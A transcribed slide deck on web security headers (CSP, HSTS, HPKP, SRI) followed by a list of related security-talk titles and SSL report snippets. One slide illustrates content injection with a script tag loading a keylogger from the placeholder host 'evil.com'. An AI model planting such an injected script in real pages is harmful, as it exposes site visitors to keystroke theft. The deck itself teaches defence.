CSP STS PKP SRI ETC OMG WTF BBQ
|
|
|
- Emma Stevens
- 6 years ago
- Views:
Transcription
1 CSP STS PKP SRI ETC OMG WTF BBQ Scott Helme Security scotthelme.co.uk
2 Modern Web Security Standards Scott Helme Security scotthelme.co.uk
3
4
5
6
7
8 HTTPS HTTP/2 Image Sprites Concatenating JS / CSS Domain Sharding Powerful Features Geolocation API getusermedia() AppCache Brotli Compression SEO Boost
9 How security has evolved
10 Browser support
11 What are security headers? Content-Security-Policy Content-Security-Policy-Report-Only X-Webkit-Content-Security-Policy X-Content-Security-Policy Public-Key-Pins Public-Key-Pins-Report-Only Strict-Transport-Security X-Content-Type-Options X-Frame-Options X-XSS-Protection X-Download-Options X-Permitted-Cross-Domain-Policies
12 Content Security Policy
13 Content Injection <html> <head> </head> <body> <script src= evil.com/keylogger.js ></script> </body>
14 What is CSP? cache-control: max-age=0, no-cache content-encoding: gzip content-security-policy: [policy goes here] date: Fri, 07 Oct :00:00 server: fronteers status: 200
15 CSP Directives child-src connect-src default-src font-src frame-src img-src media-src object-src script-src style-src
16 A basic policy Content-Security-Policy: default-src self example.com
17 Fine tuning Content-Security-Policy: default-src self ; script-src self cdnjs.cloudflare.com ajax.googleapis.com <script src=" </script> <script src=" </script>
18 Fine tuning Content-Security-Policy: default-src self ; script-src [source list]; style-src [source list]; img-src [source list]; frame-src [source list];
19 Mixed-Content
20 Mixed-Content
21 Mixed-Content
22 Mixed-Content block-all-mixed-content <img src= >
23 Mixed-Content upgrade-insecure-requests <img src= >
24 Mixed-Content Detection Content-Security-Policy-Report-Only: default-src report-uri { "csp-report": { "document-uri": " "violated-directive": "default-src effective-directive": img-src", "blocked-uri": "
25 Testing CSP Content-Security-Policy-Report-Only: [policy] Console: Refused to load the script because it violates the following Content Security Policy directive: script-src
26
27 Strict Transport Security
28 Without HSTS GET HTTP GET HTTPS
29 SSL/TLS stripped HTTP HTTPS
30 What is STS? cache-control: max-age=0, no-cache content-encoding: gzip strict-transport-security: [policy goes here] date: Fri, 07 Oct :00:00 server: fronteers status: 200
31 STS Directives max-age includesubdomains preload
32 An STS Policy Strict-Transport-Security: max-age=
33 With HSTS HTTPS
34 Public Key Pinning
35 Rogue Certificates scotthelme.co.uk scotthelme.co.uk
36
37 What is HPKP? cache-control: max-age=0, no-cache content-encoding: gzip public-key-pins: [policy goes here] date: Fri, 07 Oct :00:00 server: fronteers status: 200
38 HPKP Directives pin-sha256 max-age includesubdomains
39 A HPKP Policy Public-Key-Pins: pin-sha256="x3pgtsoujeevw989ij/cetxuemy52zs1tzqru06kukg="; pin-sha256="mhjyvthihurjcxw6wcqyoistxisinsdj3xk8qrzbhec="; max-age=
40 What s in a pin? scott@scotthelme:~$ openssl x509 -in ecdsa.crt -noout -text Subject Public Key Info: Public Key Algorithm: id-ecpublickey Public-Key: (256 bit) pub: 04:82:2a:6e:ae:28:2f:9a:9a:e4:46:14:e4:ed:5e: 8d:01:87:e9:cd:22:56:ec:e5:7b:04:55:66:8f:d4: bc:bb:8a:01:9e:a1:f9:be:b6:0b:c4:ec:b7:32:1e: 77:56:01:6b:cd:69:74:f6:32:65:84:d8:36:88:a1: 0f:35:31:9a:7c ASN1 OID: prime256v1
41 Where to pin? DST Root Let s Encrypt X3 scotthelme.co.uk
42 HPKP Reporting Public-Key-Pins-Report-Only: [policy]; report-uri { served-chain : -----BEGIN CERTIFICATE-----, validated-chain : BEGIN CERTIFICATE -----, known-pins : pin-sha256=x3pgtsoujeevw989ij/cetx, hostname : scotthelme.co.uk
43
44 Subresource Integrity
45 3 rd Party Trust scotthelme.co.uk somecdn.com
46 What is SRI? <script src= somecdn.com/jquery.min.js > </script> <script src= somecdn.com/jquery.min.js crossorigin= anonymous integrity= sha256-[base64] > </script>
47 What s in an SRI hash? scott@scotthelme:~$ cat jquery.min.js openssl dgst -sha256 -binary openssl base64 capmelcajqlufkrgijikos9lchnil86lggnfmlljeqa= capmelcajqlufkrgijikos9lchnil86lggnfmlljeqa=
48 SRI deployed <script src= somecdn.com/jquery.min.js crossorigin= anonymous integrity= sha256-[hash goes here] > </script>
49 3 rd Party Trust scotthelme.co.uk somecdn.com
50 Secure all the things! Scott Helme Security scotthelme.co.uk
High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018
HTB_WEBSECDOCS_v1.3.pdf Page 1 of 29 High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018 General Overview... 2 Meta-information... 4 HTTP Additional
MODERN WEB APPLICATION DEFENSES
MODERN WEB APPLICATION DEFENSES AGAINST DANGEROUS NETWORK ATTACKS Philippe De Ryck SecAppDev 2017 https://www.websec.be SETUP OF THE HANDS-ON SESSION I have prepared a minimal amount of slides Explain
Moving your website to HTTPS - HSTS, TLS, HPKP, CSP and friends
Moving your website to HTTPS - HSTS, TLS, HPKP, CSP and friends CTDOTNET February 21, 2017 Robert Hurlbut RobertHurlbut.com @RobertHurlbut Robert Hurlbut Software Security Consultant, Architect, and Trainer
HTTP Security Headers Explained
HTTP Security Headers Explained Scott Sauber Slides at scottsauber.com scottsauber Audience Anyone with a website Agenda What are HTTP Security Headers? Why do they matter? HSTS, XFO, XSS, CSP, CTO, RH,
Using HTTPS - HSTS, TLS, HPKP, CSP and friends
Using HTTPS - HSTS, TLS, HPKP, CSP and friends Boston.NET Architecture Group May 17, 2017 Robert Hurlbut RobertHurlbut.com @RobertHurlbut Robert Hurlbut Software Security Consultant, Architect, and Trainer
SSL Report: ( )
Home Projects Qualys.com Contact You are here: Home > Projects > SSL Server Test > www.workbench.nationaldataservice.org SSL Report: www.workbench.nationaldataservice.org (141.142.210.100) Assessed on:
Defense-in-depth techniques. for modern web applications
Defense-in-depth techniques for modern web applications About Us Lukas Weichselbaum Michele Spagnuolo Senior Information Security Engineer Senior Information Security Engineer We work in a focus area of
Extending the browser to secure applications
Extending the browser to secure applications Highlights from W3C WebAppSec Group Deian Stefan Modern web apps have many moving pieces & parties Application code & content itself User provided content (e.g.,
BOOSTING THE SECURITY
BOOSTING THE SECURITY OF YOUR ANGULAR APPLICATION Philippe De Ryck March 2017 https://www.websec.be ANGULAR APPLICATIONS RUN WITHIN THE BROWSER JS code HTML code Load application JS code / HTML code JS
HTTPS and the Lock Icon
Web security HTTPS and the Lock Icon Goals for this lecture Brief overview of HTTPS: How the SSL/TLS protocol works (very briefly) How to use HTTPS Integrating HTTPS into the browser Lots of user interface
Can HTTP Strict Transport Security Meaningfully Help Secure the Web? nicolle neulist June 2, 2012 Security B-Sides Detroit
Can HTTP Strict Transport Security Meaningfully Help Secure the Web? nicolle neulist June 2, 2012 Security B-Sides Detroit 1 2 o hai. 3 Why Think About HTTP Strict Transport Security? Roadmap what is HSTS?
RKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
SSL/TLS Security Assessment of e-vo.ru
SSL/TLS Security Assessment of e-vo.ru Test SSL/TLS implementation of any service on any port for compliance with industry best-practices, NIST guidelines and PCI DSS requirements. The server configuration
Browser code isolation
CS 155 Spring 2016 Browser code isolation John Mitchell Acknowledgments: Lecture slides are from the Computer Security course taught by Dan Boneh and John Mitchell at Stanford University. When slides are
NoScript, CSP and ABE: When The Browser Is Not Your Enemy
NoScript, CSP and ABE: When The Browser Is Not Your Enemy Giorgio Maone CTO, NoScript lead developer InformAction OWASP-Italy Day IV Milan 6th, November 2009 Copyright 2008 - The OWASP Foundation Permission
SSL/TLS Server Test of grupoconsultorefe.com
SSL/TLS Server Test of grupoconsultorefe.com Test SSL/TLS implementation of any service on any port for compliance with PCI DSS requirements, HIPAA guidance and NIST guidelines. GRUPOCONSULTOREFE.COM FINAL
SSL/TLS Server Test of
SSL/TLS Server Test of www.rotenburger-gruene.de Test SSL/TLS implementation of any service on any port for compliance with PCI DSS requirements, HIPAA guidance and NIST guidelines. WWW.ROTENBURGER-GRUENE.DE
Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild
Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius Steffens German OWASP Day 2018 joint work with Christian Rossow, Martin Johns and Ben Stock Dimensions
Match the attack to its description:
Match the attack to its description: 8 7 5 6 4 2 3 1 Attacks: Using Components with Known Vulnerabilities Missing Function Level Access Control Sensitive Data Exposure Security Misconfiguration Insecure
Web Security. New Browser Security Technologies
OWASP AppSec APAC 2013 The OWASP Foundation http://www.owasp.org Web Security New Browser Security Technologies Tobias Gondrom OWASP London OWASP Global Industry Committee Chair of IETF Web Security WG
HSTS Supports Targeted Surveillance
HSTS Supports Targeted Surveillance Paul Syverson and Matt Traudt Center for High Assurance Computer Systems (CHACS) U.S. Naval Research Laboratory Washington DC FOCI `18: Free and Open Communications
SSL Report: printware.co.uk ( )
1 of 5 26/06/2015 14:27 Home Projects Qualys.com Contact You are here: Home > Projects > SSL Server Test > printware.co.uk SSL Report: printware.co.uk (194.143.166.5) Assessed on: Fri, 26 Jun 2015 12:53:08
DID WE LOSE THE BATTLE FOR A SECURE WEB?
DID WE LOSE THE BATTLE FOR A SECURE WEB? Philippe De Ryck Guest lecture Capita Selecta, UCLL, December 14 th 2016 https://www.websec.be ABOUT ME PHILIPPE DE RYCK My goal is to help you build secure web
CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
Scan Report Executive Summary. Part 2. Component Compliance Summary Component (IP Address, domain, etc.):ekk.worldtravelink.com
Scan Report Executive Summary Part 1. Scan Information Scan Customer Company: Date scan was completed: Travolutionary ASV Company: Comodo CA Limited 10-03-2018 Scan expiration date: 01-01-2019 Part 2.
Keys to Web Front End Performance Optimization
Keys to Web Front End Performance Optimization Contents Preface... 3 Web Front End Performance Paradigm... 4 Best practices/optimizations enhancing the Web Front End Performance... 5 WWW of Performance
CSP ODDITIES. Michele Spagnuolo Lukas Weichselbaum
ODDITIES Michele Spagnuolo Lukas Weichselbaum ABOUT US Michele Spagnuolo Lukas Weichselbaum Information Security Engineer Information Security Engineer We work in a special focus area of the Google security
Content Security Policy
Content Security Policy And mitigating Cross-site Scripting vulnerabilities Joseph Fields M.Sc Computer Science - December 2016 Introduction HTML and Javascript power billions of websites visited daily
Content Security Policy
About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training
ICS 351: Today's plan. IPv6 routing protocols (summary) HTML HTTP web scripting languages certificates (review) cookies
ICS 351: Today's plan IPv6 routing protocols (summary) HTML HTTP web scripting languages certificates (review) cookies IPv6 routing almost the same routing protocols as for IPv4: RIPng, OSPFv6, BGP with
SSL Report: cartridgeworld.co.uk ( )
1 of 5 26/06/2015 14:21 Home Projects Qualys.com Contact You are here: Home > Projects > SSL Server Test > cartridgeworld.co.uk SSL Report: cartridgeworld.co.uk (95.138.147.104) Assessed on: Fri, 26 Jun
Uniform Resource Locators (URL)
The World Wide Web Web Web site consists of simply of pages of text and images A web pages are render by a web browser Retrieving a webpage online: Client open a web browser on the local machine The web
So we broke all CSPs. You won't guess what happened next!
So we broke all CSPs You won't guess what happened next! whoami and Past Work Michele Spagnuolo Senior Information Security Engineer bitiodine.net rosettaflash.com Recap what happened last year Summary
Tabular Presentation of the Application Software Extended Package for Web Browsers
Tabular Presentation of the Application Software Extended Package for Web Browsers Version: 2.0 2015-06-16 National Information Assurance Partnership Revision History Version Date Comment v 2.0 2015-06-16
SSL Report: sharplesgroup.com ( )
1 of 5 26/06/2015 14:28 Home Projects Qualys.com Contact You are here: Home > Projects > SSL Server Test > sharplesgroup.com SSL Report: sharplesgroup.com (176.58.116.26) Assessed on: Fri, 26 Jun 2015
COMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2017 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2465 1 Assignment
ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.
1 ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS Waqas Nazir - CEO - DigitSec, Inc. EXPLOITATION AND SECURITY 2 OF SAAS APPLICATIONS OVERVIEW STATE OF SAAS SECURITY CHALLENGES WITH SAAS FORCE.COM
BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION
BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION Philippe De Ryck NG-BE Conference, December 9 th 2016 https://www.websec.be ABOUT ME PHILIPPE DE RYCK My goal is to help you build secure web applications
Evaluating the Security Risks of Static vs. Dynamic Websites
Evaluating the Security Risks of Static vs. Dynamic Websites Ballard Blair Comp 116: Introduction to Computer Security Professor Ming Chow December 13, 2017 Abstract This research paper aims to outline
CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
Scan Report Executive Summary
Scan Report Executive Summary Part 1. Scan Information Scan Customer Company: Date scan was completed: Vin65 ASV Company: Comodo CA Limited 08/28/2017 Scan expiration date: 11/26/2017 Part 2. Component
Requirements from the Application Software Extended Package for Web Browsers
Requirements from the Application Software Extended Package for Web Browsers Version: 2.0 2015-06-16 National Information Assurance Partnership Revision History Version Date Comment v 2.0 2015-06-16 Application
Sichere Software vom Java-Entwickler
Sichere Software vom Java-Entwickler Dominik Schadow Java Forum Stuttgart 05.07.2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN We can no longer
Modern client-side defenses. Deian Stefan
Modern client-side defenses Deian Stefan Modern web site Modern web site Page code Modern web site Modern web site Page code Ad code Modern web site Page code Ad code Third-party APIs Modern web site Page
SSL Report: bourdiol.xyz ( )
Home Projects Qualys.com Contact You are here: Home > Projects > SSL Server Test > bourdiol.xyz > 217.70.180.152 SSL Report: bourdiol.xyz (217.70.180.152) Assessed on: Sun Apr 19 12:22:55 PDT 2015 HIDDEN
Cryptography SSL/TLS. Network Security Workshop. 3-5 October 2017 Port Moresby, Papua New Guinea
Cryptography SSL/TLS Network Security Workshop 3-5 October 2017 Port Moresby, Papua New Guinea 1 History Secure Sockets Layer was developed by Netscape in 1994 as a protocol which permitted persistent
Breaking Out HSTS (and HPKP) on Firefox, IE/Edge and (Possibly)
Breaking Out HSTS (and HPKP) on Firefox, IE/Edge and (Possibly) Chrome. Sheila Ayelen Berta Security Researcher ElevenPaths (Telefonica Digital cyber security unit) Sergio De Los Santos Head of Innovation
Drupal Frontend Performance & Scalability
Riverside Drupal Meetup @ Riverside.io August 14, 2014 Christefano Reyes christo@larks.la, @christefano Who's Your Presenter? Who's Your Presenter? Why We Care About Performance Who's Your Presenter? Why
Northeastern University Systems Security Lab
Northeastern University Systems Security Lab Why is CSP Failing? Trends and Challenges in CSP Adoption Symposium on Research in Attacks, Intrusions and Defenses (RAID) Gothenburg, Sweden, September 2014
Welcome to the OWASP TOP 10
Welcome to the OWASP TOP 10 Secure Development for Java Developers Dominik Schadow 03/20/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN 1 AGENDA
Control for CloudFlare - Installation and Preparations
Control for CloudFlare - Installation and Preparations Installation Backup your web directory and Magento 2 store database; Download Control for CloudFlare installation package; Copy files to /app/firebear/cloudflare/
Brocade Virtual Traffic Manager and Parallels Remote Application Server
White Paper Parallels Brocade Virtual Traffic Manager and Parallels Deployment Guide 01 Contents Preface...4 About This Guide...4 Audience...4 Contacting Brocade...4 Internet...4 Technical Support...4
Web Security. CSU CS557 - Fall 2017 Instructor: Lorenzo De Carli
Web Security CSU CS557 - Fall 2017 Instructor: Lorenzo De Carli 1 Network Security Application (high-level data stream) Traditional focus of network security Transport (reliable transmission of packets)
Executive Summary. Performance Report for: https://edwardtbabinski.us/blogger/social/index. The web should be fast. How does this affect me?
The web should be fast. Executive Summary Performance Report for: https://edwardtbabinski.us/blogger/social/index Report generated: Test Server Region: Using: Analysis options: Tue,, 2017, 4:21 AM -0400
Sichere Webanwendungen mit Java
Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit Patch fast Unsafe platform unsafe web application Now lets have a look at the developers OWASP
Ge#ng The Most Out Of CSP: A Deep Dive. Sergey Shekyan
Ge#ng The Most Out Of CSP: A Deep Dive Sergey Shekyan Canadian Staging Professionals (CSP) CSP Home Staging CerFficaFon Course Is Simply The Best EducaFon and Support For Your New Career Mastering the
Web basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
W3Conf, November 15 & 16, Brad Scott
The Future of Web Application Security W3Conf, November 15 & 16, 2011 Brad Hill @hillbrad bhill@paypal-inc.com Scott Stender @scottstender scott@isecpartners.com The History of Web App Security Attacker
Web basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
Scan Report Executive Summary
Scan Report Executive Summary Part 1. Scan Information Scan Customer Company: Date scan was completed: Vin65 ASV Company: Comodo CA Limited 11/20/2017 Scan expiration date: 02/18/2018 Part 2. Component
Know Your Own Risks: Content Security Policy Report Aggregation and Analysis
SESSION ID: CDS-F03 Know Your Own Risks: Content Security Policy Report Aggregation and Analysis Ksenia Dmitrieva Senior Consultant Cigital, Inc. @KseniaDmitrieva Agenda What is Content Security Policy
How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
Writing Secure Chrome Apps and Extensions
Writing Secure Chrome Apps and Extensions Keeping your users safe Jorge Lucángeli Obes Software Engineer Keeping users safe A lot of work going into making browsers more secure What about users' data?
OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13
Airlock and the OWASP TOP 10-2017 Version 2.1 11.24.2017 OWASP Top 10 A1 Injection... 3 A2 Broken Authentication... 5 A3 Sensitive Data Exposure... 6 A4 XML External Entities (XXE)... 7 A5 Broken Access
Joomla 3.X Global Settings Part III Server Settings
Joomla 3.X Global Settings Part III Server Settings Diagram 1 Path to Temp Folder: This is a text box adjacent to this prompt which holds the path to Joomla s temp folder on the web server. This is the
HTML5 Unbound: A Security & Privacy Drama. Mike Shema Qualys
HTML5 Unbound: A Security & Privacy Drama Mike Shema Qualys A Drama in Four Parts The Meaning & Mythology of HTML5 Security From Design Security (and Privacy) From HTML5 Design, Doom & Destiny This specification
Performance Report for: Report generated: Tuesday, June 30, 2015, 3:21 AM -0700
The web should be fast. Executive Summary Performance Report for: http://smallbusinessfirststep.com/ Report generated: Tuesday, June 30, 2015, 3:21 AM -0700 Test Server Region: Vancouver, Canada Using:
Executive Summary. Performance Report for: The web should be fast. Top 5 Priority Issues. How does this affect me?
The web should be fast. Executive Summary Performance Report for: https://www.elpasoroofings.com/ Report generated: Test Server Region: Using: Wed, Nov 2, 2016, 10:30 PM -0700 Vancouver, Canada Firefox
Executive Summary. Performance Report for: The web should be fast. Top 1 Priority Issues. How does this affect me?
The web should be fast. Executive Summary Performance Report for: http://instantwebapp.co.uk/8/ Report generated: Test Server Region: Using: Fri, May 19, 2017, 4:01 AM -0700 Vancouver, Canada Firefox (Desktop)
Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December
Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers Sunny Wear OWASP Tampa Chapter December Mee@ng 1 About the Speaker Informa@on Security Architect Areas of exper@se: Applica@on,
EasyCrypt passes an independent security audit
July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored
Computer Systems Department, University of Castilla-La Mancha Albacete, Spain
Review of the HTML5 API Computer Systems Department, University of Castilla-La Mancha Albacete, Spain felix.albertos@uclm.es 5th June 2018 Félix Albertos Marco ICWE 2018 TUTORIAL Review of the HTML5 API
Executive Summary. Performance Report for: The web should be fast. Top 5 Priority Issues. How does this affect me?
The web should be fast. Executive Summary Performance Report for: https://www.weebly.com/ Report generated: Test Server Region: Using: Mon, Jul 30, 2018, 2:22 PM -0500 Vancouver, Canada Chrome (Android,
Content Security Policy. Vlastimil Zíma 24. listopadu 2017
Content Security Policy Vlastimil Zíma vlastimil.zima@nic.cz 24. listopadu 2017 Content Security Policy Obrana před XSS apod. Vázaný na HTML stránku https://content-security-policy.com/ Level 2, ve vývoji
SSL/TLS Deployment Best Practices
Version 1.0 24 Feb 2012 SSL/TLS Deployment Best Practices Ivan Ristic Qualys SSL Labs Introduction SSL/TLS is a deceptively simple technology. It is easy to deploy, and it just works... except that it
Executive Summary. Performance Report for: The web should be fast. Top 5 Priority Issues. How does this affect me?
The web should be fast. Executive Summary Performance Report for: https://www.siteground.com/ Report generated: Test Server Region: Using: Fri, Jul 27, 2018, 5:46 PM -0500 Vancouver, Canada Chrome (Android,
Oracle Application Express 5 New Features
Oracle Application Express 5 New Features 20th HrOUG conference October 16, 2015 Vladislav Uvarov Software Development Manager Database Server Technologies Division Copyright 2015, Oracle and/or its affiliates.
Design Document V2 ThingLink Startup
Design Document V2 ThingLink Startup Yon Corp Andy Chen Ashton Yon Eric Ouyang Giovanni Tenorio Table of Contents 1. Technology Background.. 2 2. Design Goal...3 3. Architectural Choices and Corresponding
ICS 351: Today's plan. web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder
ICS 351: Today's plan web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder 1 web scripting languages web content described by HTML was originally static, corresponding to files
Acknowledgments... xix
CONTENTS IN DETAIL PREFACE xvii Acknowledgments... xix 1 SECURITY IN THE WORLD OF WEB APPLICATIONS 1 Information Security in a Nutshell... 1 Flirting with Formal Solutions... 2 Enter Risk Management...
For Bitcoins and Bounties James Kettle
EXPLOITING CORS MISCONFIGURATIONS For Bitcoins and Bounties James Kettle A MORAL STORY WeBuy0day Internal team of security experts Users are all security experts Easily fenced intellectual property Trivial
Website SEO Checklist
Website SEO Checklist Main points to have a flawless start for your new website. Domain Optimization Meta Data Up-to-Date Content Optimization SEO & Analytics Social Markup Markup Accessibility Browser
Executive Summary. Performance Report for: The web should be fast. Top 4 Priority Issues
The web should be fast. Executive Summary Performance Report for: https://www.wpspeedupoptimisation.com/ Report generated: Test Server Region: Using: Tue,, 2018, 12:04 PM -0800 London, UK Chrome (Desktop)
SECURECOMM. JumpBox A Seamless Browser Proxy for Tor Pluggable Transports. Jeroen Massar, Farsight Security, Inc. IPv6 Golden Networks
SECURECOMM 26 September 2014 Beijing Yulong International Hotel, Beijing, China JumpBox A Seamless Browser Proxy for Tor Pluggable Transports Jeroen Massar, Farsight Security, Inc. massar@fsi.io Ian Mason,
Release Notes Version 7.8
Please Read Before Updating Before installing any firmware version, be sure to make a backup of your configuration and read all release notes that apply to versions more recent than the one currently running
Todd toddreifsteck
Todd Reifsteck Program Manager: Memory, Power and Performance Co-Chair of W3C Web Performance Working Group @toddreifsteck toddreifsteck toddreif@microsoft.com Building a faster browser Behind the scenes
Alliance Key Manager A Solution Brief for Partners & Integrators
Alliance Key Manager A Solution Brief for Partners & Integrators Key Management Enterprise Encryption Key Management This paper is designed to help technical managers, product managers, and developers
User Manual. Admin Report Kit for IIS 7 (ARKIIS)
User Manual Admin Report Kit for IIS 7 (ARKIIS) Table of Contents 1 Admin Report Kit for IIS 7... 1 1.1 About ARKIIS... 1 1.2 Who can Use ARKIIS?... 1 1.3 System requirements... 2 1.4 Technical Support...
ICS 351: Today's plan. web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder
ICS 351: Today's plan web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder 1 client-side scripts and security while client-side scripts do much to improve the appearance of pages,
HSTS and Cookies: Side-channels to Steal Browsing History
HSTS and Cookies: Side-channels to Steal Browsing History Adrian Dabrowski adabrowski@sba-research.org Twitter: @atrox_at Co-Authors: Georg Merzdovnik, Nikolaus Kommenda, Edgar R. Weippl DeepSec 2016-11-10
LSS Technical Specification
LSS Technical Specification Table of contents 1 Introduction... 3 2 Rendering of signature flows... 4 3 Security guidelines... 5 3.1 LSS back-end only accessible via SSL... 5 3.2 Content Security Policy...
Computer Security 3e. Dieter Gollmann. Chapter 18: 1
Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter
Network Security. Thierry Sans
Network Security Thierry Sans HTTP SMTP DNS BGP The Protocol Stack Application TCP UDP Transport IPv4 IPv6 ICMP Network ARP Link Ethernet WiFi The attacker is capable of confidentiality integrity availability
Application Layer Security
Application Layer Security General overview Ma. Angel Marquez Andrade Benefits of web Applications: No need to distribute separate client software Changes to the interface take effect immediately Client-side
Exploiting and Defending: Common Web Application Vulnerabilities
Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,
F5 irules Data Plane Programmability
Agility 2018 Hands-on Lab Guide F5 irules Data Plane Programmability F5 Networks, Inc. 2 Contents: 1 Getting Started 5 1.1 Lab Topology............................................. 5 2 Cooking with irules
An internal CA that is part of your IT infrastructure, like a Microsoft Windows CA
Purpose This document will describe how to setup to use SSL/TLS to provide encrypted connections to the. This document can also be used as an initial point for troubleshooting SSL/TLS connections. Target
Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
Enterprise Overview. Benefits and features of Cloudflare s Enterprise plan FLARE
Enterprise Overview Benefits and features of s Enterprise plan 1 888 99 FLARE enterprise@cloudflare.com www.cloudflare.com This paper summarizes the benefits and features of s Enterprise plan. State of